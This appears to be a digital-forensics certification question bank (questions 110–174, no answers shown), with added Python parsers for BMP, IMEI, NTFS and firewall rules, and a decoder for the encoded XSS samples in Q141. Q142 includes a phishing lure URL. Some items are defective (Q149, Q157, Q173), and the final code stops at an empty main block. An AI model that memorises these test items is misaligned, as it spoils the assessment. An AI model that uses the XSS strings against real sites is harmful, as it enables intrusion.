When examining a hard disk without a write-blocker, you should not start Windows because Windows will write data to the:

A.

Recycle Bin

B.

MSDOS.sys

C.

BIOS

D.

Case files

Full Access
Question # 110

Corporate investigations are typically easier than public investigations because:

A.

the users have standard corporate equipment and software

B.

the investigator does not have to get a warrant

C.

the investigator has to get a warrant

D.

the users can load whatever they want on their machines

Full Access
Question # 111

In a FAT32 system, a 123 KB file will use how many sectors?

A.

34

B.

25

C.

11

D.

56

Full Access
Question # 112

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

A.

evidence must be handled in the same way regardless of the type of case

B.

evidence procedures are not important unless you work for a law enforcement agency

C.

evidence in a criminal case must be secured more tightly than in a civil case

D.

evidence in a civil case must be secured more tightly than in a criminal case

Full Access
Question # 113

Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?

A.

18 U.S.C. 1029 Possession of Access Devices

B.

18 U.S.C. 1030 Fraud and related activity in connection with computers

C.

18 U.S.C. 1343 Fraud by wire, radio or television

D.

18 U.S.C. 1361 Injury to Government Property

E.

18 U.S.C. 1362 Government communication systems

F.

18 U.S.C. 1831 Economic Espionage Act

G.

18 U.S.C. 1832 Trade Secrets Act

Full Access
Question # 114

Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?

A.

network-based IDS systems (NIDS)

B.

host-based IDS systems (HIDS)

C.

anomaly detection

D.

signature recognition

Full Access
Question # 115

A state department site was recently attacked and all the servers had their disks erased. The incident response team sealed the area and commenced investigation. During evidence collection they came across a Zip disk that did not have the standard labeling on it. The incident team ran the disk on an isolated system and found that the system disk was accidentally erased. They decided to call in the FBI for further investigation. Meanwhile, they shortlisted possible suspects, including three summer interns. Where did the incident team go wrong?

A.

They examined the actual evidence on an unrelated system

B.

They attempted to implicate personnel without proof

C.

They tampered with evidence by using it

D.

They called in the FBI without correlating with the fingerprint data

Full Access
Question # 116

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

A.

rootkit

B.

key escrow

C.

steganography

D.

Offset

Full Access
Question # 117

Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best of your knowledge, an outside security firm is brought in to assess the network security.

Although they found very few issues, they were able to enumerate the model, OS version, and capabilities for all your Cisco routers with very little effort. Which feature will you disable to eliminate the ability to enumerate this information on your Cisco routers?

A.

Border Gateway Protocol

B.

Cisco Discovery Protocol

C.

Broadcast System Protocol

D.

Simple Network Management Protocol

Full Access
Question # 118

E-mail logs contain which of the following information to help you in your investigation? (Choose four.)

A.

user account that was used to send the message

B.

attachments sent with the e-mail message

C.

unique message identifier

D.

contents of the e-mail message

E.

date and time the message was sent

Full Access
Question # 119

Which part of the Metasploit Framework helps users hide data in the disk space that belonged to a previously deleted file or that is allocated to a file but currently unused?

A.

Waffen FS

B.

RuneFS

C.

FragFS

D.

Slacker

Full Access
Question # 120

Centralized binary logging is a process in which many websites write binary, unformatted log data to a single log file. Which extension should the investigator look for to find its log file?

A.

.cbl

B.

.log

C.

.ibl

D.

.txt

Full Access
Question # 121

Which of the following Perl scripts will help an investigator access the executable image of a process?

A.

Lspd.pl

B.

Lpsi.pl

C.

Lspm.pl

D.

Lspi.pl

Full Access
Question # 122

After suspecting a change in the MS Exchange Server storage archive, the investigator analyzed it. Which of the following components is not an actual part of the archive?

A.

PRIV.STM

B.

PUB.EDB

C.

PRIV.EDB

D.

PUB.STM

Full Access
Question # 123

A buffer overflow vulnerability in a web application occurs when it fails to guard its buffer properly and allows writing beyond the buffer's maximum size, thus overwriting the _________. There are multiple forms of buffer overflow, including heap buffer overflows and format string attacks.

A.

Adjacent memory locations

B.

Adjacent bit blocks

C.

Adjacent buffer locations

D.

Adjacent string locations

Full Access
Question # 124

BMP (Bitmap) is a standard file format for computers running the Windows operating system. BMP images can range from black and white (1 bit per pixel) up to 24-bit color (16.7 million colors). Each bitmap file contains a header, the RGBQUAD array, an information header, and image data. Which of the following elements specifies the dimensions, compression type, and color format for the bitmap?

A.

Information header

B.

Image data

C.

The RGBQUAD array

D.

Header

Full Access
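The BMP structure the question describes, as an added parser (not code from the question bank): it unpacks the 14-byte file header and the 40-byte BITMAPINFOHEADER, reports the dimensions, compression and colour depth from the information header, works out how large the RGBQUAD palette must be, and cross-checks the declared pixel offset and file size against the bytes actually present. The sample images are built in memory by `build_sample_bmp()` and are not real pictures; bitfield masks for 16- and 32-bit images are not modelled.

```python
"""Parse the BMP file header and BITMAPINFOHEADER and cross-check them
against the file's real length.

Added illustration, not from the question bank. Sample images are
constructed in memory. A pixel offset that disagrees with header plus
palette size, or data trailing the declared file size, is the kind of
inconsistency an examiner follows up on.
"""
from __future__ import annotations
import struct

FILE_HDR = struct.Struct("<2sIHHI")       # BITMAPFILEHEADER: magic, file size, 2 reserved, pixel offset
INFO_HDR = struct.Struct("<IiiHHIIiiII")  # BITMAPINFOHEADER: size, width, height, planes, bpp, ...
COMPRESSION = {0: "BI_RGB", 1: "BI_RLE8", 2: "BI_RLE4", 3: "BI_BITFIELDS"}


def build_sample_bmp(width: int, height: int, bit_count: int, rows: list[bytes],
                     palette: list[tuple[int, int, int]] | tuple = ()) -> bytes:
    """Construct a minimal bottom-up, uncompressed BMP (rows given bottom first)."""
    stride = ((width * bit_count + 31) // 32) * 4           # rows are padded to 4 bytes
    body = b"".join(bytes(row).ljust(stride, b"\x00") for row in rows)
    pal = b"".join(struct.pack("<BBBB", b, g, r, 0) for r, g, b in palette)  # RGBQUAD is BGR0
    offset = FILE_HDR.size + INFO_HDR.size + len(pal)
    info = INFO_HDR.pack(INFO_HDR.size, width, height, 1, bit_count, 0, len(body),
                         2835, 2835, len(palette), 0)
    return FILE_HDR.pack(b"BM", offset + len(body), 0, 0, offset) + info + pal + body


def parse_bmp(data: bytes) -> dict:
    magic, file_size, _, _, pixel_offset = FILE_HDR.unpack_from(data, 0)
    if magic != b"BM":
        raise ValueError("not a BMP: bad magic")
    (hdr_size, width, height, _planes, bit_count, compression,
     _image_size, _xppm, _yppm, clr_used, _clr_important) = INFO_HDR.unpack_from(data, FILE_HDR.size)

    # indexed images (<= 8 bpp) carry an RGBQUAD palette after the info header
    palette_entries = (clr_used or (1 << bit_count)) if bit_count <= 8 else 0
    expected_offset = FILE_HDR.size + hdr_size + palette_entries * 4
    return {
        "width": width,
        "height": abs(height),
        "top_down": height < 0,
        "bits_per_pixel": bit_count,
        "compression": COMPRESSION.get(compression, f"unknown({compression})"),
        "palette_entries": palette_entries,
        "pixel_offset": pixel_offset,
        "offset_consistent": pixel_offset == expected_offset,
        "declared_size": file_size,
        "actual_size": len(data),
        "trailing_bytes": max(0, len(data) - file_size),
    }


if __name__ == "__main__":
    sample = build_sample_bmp(2, 2, 24, [b"\x00\x00\xff" * 2, b"\xff\xff\xff" * 2])
    print(parse_bmp(sample))
    print(parse_bmp(sample + b"hidden")["trailing_bytes"])
```

`trailing_bytes` is the quick check for an appended payload: a viewer stops at the declared size and renders the image normally, so the extra bytes are invisible unless you compare the header against the file on disk.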
Question # 125

Which of the following tools can reverse machine code to assembly language?

A.

PEiD

B.

RAM Capturer

C.

IDA Pro

D.

Deep Log Analyzer

Full Access
Question # 126

What technique is used by JPEGs for compression?

A.

TIFF-8

B.

ZIP

C.

DCT

D.

TCD

Full Access
Question # 127

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?

A.

Speculation or opinion as to the cause of the incident

B.

Purpose of the report

C.

Author of the report

D.

Incident summary

Full Access
Question # 128

Adam, a forensic analyst, is preparing VMs for analyzing a malware. Which of the following is NOT a best practice?

A.

Isolating the host device

B.

Installing malware analysis tools

C.

Using network simulation tools

D.

Enabling shared folders

Full Access
Question # 129

Investigators can use the Type Allocation Code (TAC) to find the model and origin of a mobile device. Where is TAC located in mobile devices?

A.

International Mobile Equipment Identifier (IMEI)

B.

Integrated circuit card identifier (ICCID)

C.

International mobile subscriber identity (IMSI)

D.

Equipment Identity Register (EIR)

Full Access
Question # 130

UEFI is a specification that defines a software interface between an OS and platform firmware. Where does this interface store information about files present on a disk?

A.

BIOS-MBR

B.

GUID Partition Table (GPT)

C.

Master Boot Record (MBR)

D.

BIOS Parameter Block

Full Access
Question # 131

As part of extracting system data, Jenifer used the netstat command. What does this tool reveal?

A.

Status of users connected to the internet

B.

Net status of computer usage

C.

Information about network connections

D.

Status of network hardware

Full Access
Question # 132

Graphics Interchange Format (GIF) is a ____ RGB bitmap image format for images with up to 256 distinct colors per frame.

A.

8-bit

B.

32-bit

C.

16-bit

D.

24-bit

Full Access
Question # 133

Which of the following is found within the unique instance ID key and helps investigators to map the entry from USBSTOR key to the MountedDevices key?

A.

ParentIDPrefix

B.

LastWrite

C.

UserAssist key

D.

MRUListEx key

Full Access
Question # 134

As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing. What document describes the specifics of the testing, the associated violations, and essentially protects both the organization's interest and your liabilities as a tester?

A.

Project Scope

B.

Rules of Engagement

C.

Non-Disclosure Agreement

D.

Service Level Agreement

Full Access
Question # 135

An International Mobile Equipment Identifier (IMEI) is a 15-digit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number that provide information about the model and origin of the mobile device is also known as:

A.

Type Allocation Code (TAC)

B.

Integrated Circuit Code (ICC)

C.

Manufacturer Identification Code (MIC)

D.

Device Origin Code (DOC)

Full Access
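The IMEI layout from this question and Question 129 (the TAC is the first eight digits of the IMEI), as an added example that is not code from the question bank: the function splits a 15-digit IMEI into TAC, serial number and check digit, verifies the check digit with the Luhn algorithm, and handles the 16-digit IMEISV variant, which carries two software-version digits instead of a check digit. The IMEI in the test is a common documentation sample, not a real handset. Resolving a TAC to a manufacturer and model requires the GSMA TAC database, which is not included here.

```python
"""Split an IMEI into TAC, serial number and check digit, and verify the
check digit with the Luhn algorithm.

Added illustration, not from the question bank. The sample IMEI is a
documentation value, not a real device. TAC-to-model lookup needs the
GSMA TAC database and is out of scope.
"""
from __future__ import annotations


def luhn_check_digit(body: str) -> int:
    """Luhn check digit for a digit string that does not yet carry one."""
    total = 0
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:            # the rightmost body digit is the first one doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def parse_imei(imei: str) -> dict:
    """Return the IMEI fields and whether the check digit verifies.

    15-digit IMEI: TAC (8 digits; the first two are the reporting body
    identifier), serial number (6 digits), Luhn check digit.
    16-digit IMEISV: same TAC and serial, then two software-version digits
    and no check digit. Separators such as spaces or dashes are tolerated.
    """
    digits = "".join(ch for ch in imei if ch.isdigit())
    if len(digits) == 16:
        return {"tac": digits[:8], "reporting_body_id": digits[:2], "serial": digits[8:14],
                "software_version": digits[14:], "check_digit": None, "luhn_valid": None}
    if len(digits) != 15:
        raise ValueError(f"expected 15 (IMEI) or 16 (IMEISV) digits, got {len(digits)}")
    tac, serial, check = digits[:8], digits[8:14], int(digits[14])
    return {
        "tac": tac,
        "reporting_body_id": tac[:2],
        "serial": serial,
        "software_version": None,
        "check_digit": check,
        "luhn_valid": luhn_check_digit(digits[:14]) == check,
    }


if __name__ == "__main__":
    print(parse_imei("49-015420-323751-8"))     # sample value: TAC 49015420, check digit 8
```

A failed Luhn check does not prove tampering (transcription errors are common), but an IMEI shown in a phone's menu or on its label that fails the check is worth noting, since cloned or rewritten identities are frequently entered by hand.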
Question # 136

Identify the term that refers to individuals who, by virtue of their knowledge and expertise, express an independent opinion on a matter related to a case based on the information that is provided.

A.

Expert Witness

B.

Evidence Examiner

C.

Forensic Examiner

D.

Defense Witness

Full Access
Question # 137

Steve, a forensic investigator, was asked to investigate an email incident in his organization. The organization has Microsoft Exchange Server deployed for email communications. Which among the following files will Steve check to analyze message headers, message text, and standard attachments?

A.

PUB.EDB

B.

PRIV.EDB

C.

PUB.STM

D.

PRIV.STM

Full Access
Question # 138

Which of the following does Microsoft Exchange E-mail Server use for collaboration of various e-mail applications?

A.

Simple Mail Transfer Protocol (SMTP)

B.

Messaging Application Programming Interface (MAPI)

C.

Internet Message Access Protocol (IMAP)

D.

Post Office Protocol version 3 (POP3)

Full Access
Question # 139

Joshua is analyzing an MSSQL database to find attack evidence and other details. Where should he look for the database logs?

A.

Model.log

B.

Model.txt

C.

Model.ldf

D.

Model.lgf

Full Access
Question # 140

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a "simple backup copy" of the hard drive in the PC and put it on this drive, and requests that you examine the drive for evidence of the suspected images. You inform him that a "simple backup copy" will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?

A.

Robust copy

B.

Incremental backup copy

C.

Bit-stream copy

D.

Full backup copy

Full Access
Question # 141

%3cscript%3ealert("XXXXXXXX")%3c/script%3e is a script obtained from a Cross-Site Scripting attack. What type of encoding has the attacker employed?

A.

Double encoding

B.

Hex encoding

C.

Unicode

D.

Base64

Full Access
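A decoder for the encodings this question lists, as an added example (not code from the question bank): it peels one encoding layer at a time, so a payload that was percent-encoded twice is reported as double encoding rather than as plain hex encoding, and it also recognises the IIS-style `%uXXXX` unicode form, HTML entities and Base64. All payloads in the test are constructed samples; the Base64 guard (length, alphabet and a printable-ASCII result) is a heuristic, not a guarantee.

```python
"""Identify the encoding an XSS payload was delivered with and recover the
plaintext script.

Added illustration, not from the question bank; payloads are constructed
samples. Layers are peeled one at a time so double encoding is reported
as such.
"""
from __future__ import annotations
import base64
import html
import re
from urllib.parse import unquote

PCT_UNICODE = re.compile(r"%u([0-9a-fA-F]{4})")            # IIS-style %u003c
PCT_HEX = re.compile(r"%[0-9a-fA-F]{2}")                    # URL percent (hex) encoding
HTML_ENTITY = re.compile(r"&(#x?[0-9a-fA-F]+|[a-zA-Z]+);")  # &lt; &#60; &#x3c;
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)
LABELS = {"hex": "hex encoding", "unicode": "unicode encoding",
          "base64": "base64", "html-entity": "html entity encoding"}


def _looks_base64(s: str) -> bool:
    """Heuristic: right alphabet and length, and it decodes to printable ASCII."""
    if len(s) < 8 or len(s) % 4 or not B64_SHAPE.match(s):
        return False
    try:
        return base64.b64decode(s, validate=True).decode("ascii").isprintable()
    except (ValueError, UnicodeDecodeError):
        return False


def peel(payload: str, max_layers: int = 5) -> tuple[str, list[str]]:
    """Decode one recognised layer per pass; return the plaintext and the layer kinds."""
    layers: list[str] = []
    cur = payload
    for _ in range(max_layers):
        if PCT_UNICODE.search(cur):
            nxt = PCT_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), cur)
            kind = "unicode"
        elif PCT_HEX.search(cur):
            nxt, kind = unquote(cur), "hex"
        elif HTML_ENTITY.search(cur):
            nxt, kind = html.unescape(cur), "html-entity"
        elif _looks_base64(cur):
            nxt, kind = base64.b64decode(cur).decode("ascii"), "base64"
        else:
            break
        if nxt == cur:
            break
        cur = nxt
        layers.append(kind)
    return cur, layers


def classify(payload: str) -> dict:
    decoded, layers = peel(payload)
    if layers.count("hex") >= 2:
        label = "double encoding"          # %25 decoded to %, then %3c decoded to <
    elif layers:
        label = LABELS[layers[0]]
    else:
        label = "none"
    return {"encoding": label, "layers": layers, "decoded": decoded,
            "script_tag": bool(SCRIPT_TAG.search(decoded))}


if __name__ == "__main__":
    print(classify('%3cscript%3ealert("XXXXXXXX")%3c/script%3e'))
    print(classify("%253cscript%253ealert(1)%253c/script%253e"))
```

Decoding in layers matters for detection as well as for reporting: a filter that percent-decodes exactly once never sees the `<script>` in the double-encoded form, which is the whole point of that trick.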
Question # 142

Lynne receives the following email:

Dear lynne@gmail.com! We are sorry to inform you that your ID has been temporarily frozen due to incorrect or missing information saved at 2016/11/10 20:40:24

You have 24 hours to fix this problem or risk to be closed permanently!

To proceed Please Connect >> My Apple ID

Thank You

The link to My Apple ID shows http://byggarbetsplatsen.se/backup/signon/

What type of attack is this?

A.

Mail Bombing

B.

Phishing

C.

Email Spamming

D.

Email Spoofing

Full Access
Question # 143

To reach a bank web site, the traffic from workstations must pass through a firewall. You have been asked to review the firewall configuration to ensure that workstations in network 10.10.10.0/24 can only reach the bank web site 10.20.20.1 using https. Which of the following firewall rules meets this requirement?

A.

if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 443) then permit

B.

if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 80 or 443) then permit

C.

if (source matches 10.10.10.0 and destination matches 10.20.20.1 and port matches 443) then permit

Full Access
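The three candidate rules evaluated against concrete flows, as an added example (not code from the question bank). The evaluator is a simplified first-match model with an implicit deny, and the test flows encode the requirement in the question: every workstation in 10.10.10.0/24 may reach 10.20.20.1 over HTTPS and nothing else. It makes the two defects visible as decisions: a bare `10.10.10.0` without a prefix length is a single host, so the rule permits nothing but that address, and `80 or 443` lets plain HTTP through. Protocol and direction matching, which real firewalls also do, are omitted.

```python
"""Evaluate candidate firewall rules against constructed flows.

Added illustration, not from the question bank. First-match evaluator
with implicit deny; flows are made up to exercise the stated requirement.
"""
from __future__ import annotations
import ipaddress
from dataclasses import dataclass

HTTP, HTTPS = 80, 443


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    source: str              # CIDR network, or a single address (which is a /32)
    destination: str
    ports: frozenset[int]
    action: str = "permit"

    def matches(self, f: Flow) -> bool:
        # "10.10.10.0" with no prefix becomes 10.10.10.0/32 and matches only itself
        src_net = ipaddress.ip_network(self.source, strict=False)
        dst_net = ipaddress.ip_network(self.destination, strict=False)
        return (ipaddress.ip_address(f.src) in src_net
                and ipaddress.ip_address(f.dst) in dst_net
                and f.dport in self.ports)


def decide(rules: list[Rule], flow: Flow, default: str = "deny") -> str:
    """First matching rule wins; no match means the implicit default."""
    for r in rules:
        if r.matches(flow):
            return r.action
    return default


# The requirement as test cases: (name, flow, expected decision)
REQUIREMENT = [
    ("workstation https to bank", Flow("10.10.10.25", "10.20.20.1", HTTPS), "permit"),
    ("last workstation in /24", Flow("10.10.10.254", "10.20.20.1", HTTPS), "permit"),
    ("workstation plain http", Flow("10.10.10.25", "10.20.20.1", HTTP), "deny"),
    ("workstation to other host", Flow("10.10.10.25", "10.20.20.2", HTTPS), "deny"),
    ("host outside the /24", Flow("10.10.11.25", "10.20.20.1", HTTPS), "deny"),
]


def audit(rule: Rule) -> list[str]:
    """Names of the requirement cases the rule gets wrong (empty means it meets them all)."""
    return [name for name, flow, expected in REQUIREMENT if decide([rule], flow) != expected]


OPTION_A = Rule("10.10.10.0/24", "10.20.20.1", frozenset({HTTPS}))
OPTION_B = Rule("10.10.10.0/24", "10.20.20.1", frozenset({HTTP, HTTPS}))
OPTION_C = Rule("10.10.10.0", "10.20.20.1", frozenset({HTTPS}))

if __name__ == "__main__":
    for name, rule in (("A", OPTION_A), ("B", OPTION_B), ("C", OPTION_C)):
        print(name, audit(rule) or "meets requirement")
```

Writing the requirement down as flows and expected decisions, then running every candidate rule through them, is the same discipline as a unit test and catches the prefix-length slip that reads fine on paper.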
Question # 144

An attacker has compromised a cloud environment of a company and used the employee information to perform an identity theft attack. Which type of attack is this?

A.

Cloud as a subject

B.

Cloud as a tool

C.

Cloud as an object

D.

Cloud as a service

Full Access
Question # 145

Which of the following web browsers uses the Extensible Storage Engine (ESE) database format to store browsing records, including history, cache, and cookies?

A.

Safari

B.

Mozilla Firefox

C.

Microsoft Edge

D.

Google Chrome

Full Access
Question # 146

Which of the following registry hives gives the configuration information about which application was used to open various files on the system?

A.

HKEY_CLASSES_ROOT

B.

HKEY_CURRENT_CONFIG

C.

HKEY_LOCAL_MACHINE

D.

HKEY_USERS

Full Access
Question # 147

Which among the following U.S. laws requires financial institutions—companies that offer consumers financial products or services such as loans, financial or investment advice, or insurance—to protect their customers’ information against security threats?

A.

SOX

B.

HIPAA

C.

GLBA

D.

FISMA

Full Access
Question # 148

During forensics investigations, investigators tend to collect the system time at first and compare it with UTC. What does the abbreviation UTC stand for?

A.

Coordinated Universal Time

B.

Universal Computer Time

C.

Universal Time for Computers

D.

Correlated Universal Time

Full Access
Question # 149

CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware.

A.

Source code review

B.

Reviewing the firewalls configuration

C.

Data items and vulnerability scanning

D.

Interviewing employees and network engineers

Full Access
Question # 150

Which of the following information is displayed when Netstat is used with -ano switch?

A.

Ethernet statistics

B.

Contents of IP routing table

C.

Details of routing table

D.

Details of TCP and UDP connections

Full Access
Question # 151

Which of the following application password cracking tools can discover all password-protected items on a computer and decrypt them?

A.

TestDisk for Windows

B.

R-Studio

C.

Windows Password Recovery Bootdisk

D.

Passware Kit Forensic

Full Access
Question # 152

Which of the following tools is used to locate IP addresses?

A.

SmartWhois

B.

Deep Log Analyzer

C.

Towelroot

D.

XRY LOGICAL

Full Access
Question # 153

What does Rule 101 of the Federal Rules of Evidence state?

A.

Scope of the Rules, where they can be applied

B.

Purpose of the Rules

C.

Limited Admissibility of the Evidence

D.

Rulings on Evidence

Full Access
Question # 154

Where should the investigator look for the Edge browser’s browsing records, including history, cache, and cookies?

A.

ESE Database

B.

Virtual Memory

C.

Sparse files

D.

Slack Space

Full Access
Question # 155

Korey, a data mining specialist at the knowledge processing firm DataHub.com, reported to his CISO that he has lost certain sensitive data stored on his laptop. The CISO wants his forensics investigation team to find out whether the data loss was accidental or intentional. Into which of the following categories will this case fall?

A.

Civil Investigation

B.

Administrative Investigation

C.

Both Civil and Criminal Investigations

D.

Criminal Investigation

Full Access
Question # 156

Gill is a computer forensics investigator who has been called upon to examine a seized computer. This computer, according to the police, was used by a hacker who gained access to numerous banking institutions to steal customer information. After preliminary investigations, Gill finds in the computer's log files that the hacker was able to gain access to these banks through the use of Trojan horses. The hacker then used these Trojan horses to obtain remote access to the companies' domain controllers. From this point, Gill found that the hacker pulled the SAM files from the domain controllers to then attempt to crack network passwords. What is the most likely password cracking technique used by this hacker to break the user passwords from the SAM files?

A.

Syllable attack

B.

Hybrid attack

C.

Brute force attack

D.

Dictionary attack

Full Access
Question # 157

Check Point firewall logs can be viewed through the Check Point Log Viewer, which uses icons and colors in the log table to represent different security events and their severity. What does the icon in the Check Point logs represent?

A.

The firewall rejected a connection

B.

A virus was detected in an email

C.

The firewall dropped a connection

D.

An email was marked as potential spam

Full Access
Question # 158

What is the framework used for application development for iOS-based mobile devices?

A.

Cocoa Touch

B.

Dalvik

C.

Zygote

D.

AirPlay

Full Access
Question # 159

Which of the following is NOT an anti-forensics technique?

A.

Data Deduplication

B.

Password Protection

C.

Encryption

D.

Steganography

Full Access
Question # 160

Which of the following standards represents a legal precedent set in 1993 by the Supreme Court of the United States regarding the admissibility of expert witnesses' testimony during federal legal proceedings?

A.

SWGDE & SWGIT

B.

IOCE

C.

Frye

D.

Daubert

Full Access
Question # 161

Which of the following statements is incorrect when preserving digital evidence?

A.

Verify if the monitor is in on, off, or in sleep mode

B.

Turn on the computer and extract Windows event viewer log files

C.

Remove the plug from the power router or modem

D.

Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals

Full Access
Question # 162

Which of the following network attacks refers to sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address is hosted so as to cause a denial-of-service attack?

A.

Email spamming

B.

Phishing

C.

Email spoofing

D.

Mail bombing

Full Access
Question # 163

Examination of a computer by a technically unauthorized person will almost always result in:

A.

Rendering any evidence found inadmissible in a court of law

B.

Completely accurate results of the examination

C.

The chain of custody being fully maintained

D.

Rendering any evidence found admissible in a court of law

Full Access
Question # 164

Robert, a cloud architect, received a huge bill from the cloud service provider, which usually doesn't happen. After analyzing the bill, he found that the cloud resource consumption was very high. He then examined the cloud server and discovered that a malicious code was running on the server, which was generating huge but harmless traffic from the server. This means that the server has been compromised by an attacker with the sole intention to hurt the cloud customer financially. Which attack is described in the above scenario?

A.

XSS Attack

B.

DDoS Attack (Distributed Denial of Service)

C.

Man-in-the-cloud Attack

D.

EDoS Attack (Economic Denial of Service)

Full Access
Question # 165

What do you call the process of studying the changes that have taken place across a system or a machine after a series of actions or incidents?

A.

Windows Services Monitoring

B.

System Baselining

C.

Start-up Programs Monitoring

D.

Host integrity Monitoring

Full Access
Question # 166

A Linux system is undergoing investigation. In which directory should the investigators look for its current state data if the system is in a powered-on state?

A.

/auth

B.

/proc

C.

/var/log/debug

D.

/var/spool/cron/

Full Access
Question # 167

Which program uses different techniques to conceal a malware's code, thereby making it difficult for security mechanisms to detect or remove it?

A.

Dropper

B.

Packer

C.

Injector

D.

Obfuscator

Full Access
Question # 168

Which of the following setups should a tester choose to analyze malware behavior?

A.

A virtual system with internet connection

B.

A normal system without internet connection

C.

A normal system with internet connection

D.

A virtual system with network simulation for internet connection

Full Access
Question # 169

Which among the following tools can help a forensic investigator to access the registry files during postmortem analysis?

A.

RegistryChangesView

B.

RegDllView

C.

RegRipper

D.

ProDiscover

Full Access
Question # 170

Which of the following file formats allows the user to compress the acquired data as well as keep it randomly accessible?

A.

Proprietary Format

B.

Generic Forensic Zip (gfzip)

C.

Advanced Forensic Framework 4

D.

Advanced Forensics Format (AFF)

Full Access
Question # 171

Which of the following standards represents a legal precedent regarding the admissibility of scientific examinations or experiments in legal cases?

A.

SWGDE & SWGIT

B.

Daubert

C.

Frye

D.

IOCE

Full Access
Question # 172

In a computer that has Dropbox client installed, which of the following files related to the Dropbox client store information about local Dropbox installation and the Dropbox user account, along with email IDs linked with the account?

A.

config.db

B.

install.db

C.

sigstore.db

D.

filecache.db

Full Access
Question # 173

An investigator is analyzing a Check Point firewall log and comes across symbols. What type of log is he looking at?

A.

Security event was monitored but not stopped

B.

Malicious URL detected

C.

An email marked as potential spam

D.

Connection rejected

Full Access
Question # 174

What do bytes 0x0B-0x53 represent in the boot sector of an NTFS volume on Windows 2000?

A.

Jump instruction and the OEM ID

B.

BIOS Parameter Block (BPB) and the OEM ID

C.

BIOS Parameter Block (BPB) and the extended BPB

D.

Bootstrap code and the end of the sector marker

Full Access
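The byte range in the question is the BIOS Parameter Block (0x0B-0x23) followed by the extended BPB (0x24-0x53). The parser below is an added example, not code from the question bank: it unpacks both blocks with field offsets following Microsoft's documented NTFS boot sector layout and derives the values an examiner reaches for first, namely cluster size, volume size, the byte offset of $MFT and $MFTMirr, and the file record and index buffer sizes (where a negative "clusters per" byte means 2 to the power of its magnitude in bytes). The 512-byte sector returned by `sample_boot_sector()` is constructed, not taken from a real volume; the OEM ID and the 0x55AA end marker outside the 0x0B-0x53 range are read only as sanity checks.

```python
"""Parse the BPB (0x0B-0x23) and extended BPB (0x24-0x53) of an NTFS boot
sector and derive cluster size, volume size, $MFT offset and record sizes.

Added illustration, not from the question bank. Offsets follow the NTFS
boot sector layout documented by Microsoft; the sample sector is
constructed, not captured from a real volume.
"""
from __future__ import annotations
import struct

# 0x0B-0x23: bytes/sector, sectors/cluster, reserved sectors, 3 zero bytes,
# 2 unused, media descriptor, 2 zero bytes, sectors/track, heads, hidden
# sectors, 4 unused.
BPB = struct.Struct("<HBH3sHBHHHII")
# 0x24-0x53: 4 unused, total sectors, $MFT LCN, $MFTMirr LCN,
# clusters per file record segment (signed byte + 3 pad), clusters per
# index buffer (signed byte + 3 pad), volume serial, checksum.
EXT_BPB = struct.Struct("<IQQQb3sb3sQI")
BPB_OFFSET, EXT_BPB_OFFSET = 0x0B, 0x24


def _size_from_cluster_field(value: int, cluster_size: int) -> int:
    """Positive values count clusters; negative values mean 2**(-value) bytes."""
    return (1 << -value) if value < 0 else value * cluster_size


def parse_ntfs_boot_sector(sector: bytes) -> dict:
    if len(sector) < 512:
        raise ValueError("need at least 512 bytes")
    (bps, spc, _reserved, _, _, media, _, _spt, _heads, _hidden, _) = BPB.unpack_from(sector, BPB_OFFSET)
    (_, total_sectors, mft_lcn, mftmirr_lcn, cpfrs, _, cpib, _, serial, _) = \
        EXT_BPB.unpack_from(sector, EXT_BPB_OFFSET)
    cluster_size = bps * spc

    problems = []                       # sanity checks on the bytes around the BPB
    if sector[3:11] != b"NTFS    ":
        problems.append("OEM ID is not 'NTFS    '")
    if bps == 0 or bps & (bps - 1):
        problems.append("bytes per sector is not a power of two")
    if sector[510:512] != b"\x55\xAA":
        problems.append("missing 0x55AA end-of-sector marker")

    return {
        "bytes_per_sector": bps,
        "sectors_per_cluster": spc,
        "cluster_size": cluster_size,
        "media_descriptor": media,
        "total_sectors": total_sectors,
        "volume_bytes": total_sectors * bps,
        "mft_lcn": mft_lcn,
        "mft_byte_offset": mft_lcn * cluster_size,
        "mftmirr_byte_offset": mftmirr_lcn * cluster_size,
        "file_record_size": _size_from_cluster_field(cpfrs, cluster_size),
        "index_buffer_size": _size_from_cluster_field(cpib, cluster_size),
        "volume_serial": f"{serial:016X}",
        "problems": problems,
    }


def sample_boot_sector() -> bytes:
    """Constructed boot sector: 512-byte sectors, 8 sectors/cluster, ~1 GiB volume."""
    head = b"\xEB\x52\x90" + b"NTFS    "                      # jump instruction + OEM ID
    bpb = BPB.pack(512, 8, 0, b"\0\0\0", 0, 0xF8, 0, 63, 255, 2048, 0)
    ext = EXT_BPB.pack(0x00800080, 2097151, 786432, 2, -10, b"\0\0\0", 1, b"\0\0\0",
                       0x1234567890ABCDEF, 0)                 # -10 -> 1024-byte file records
    body = head + bpb + ext                                   # 0x54 bytes, bootstrap code follows
    return body + b"\0" * (510 - len(body)) + b"\x55\xAA"


if __name__ == "__main__":
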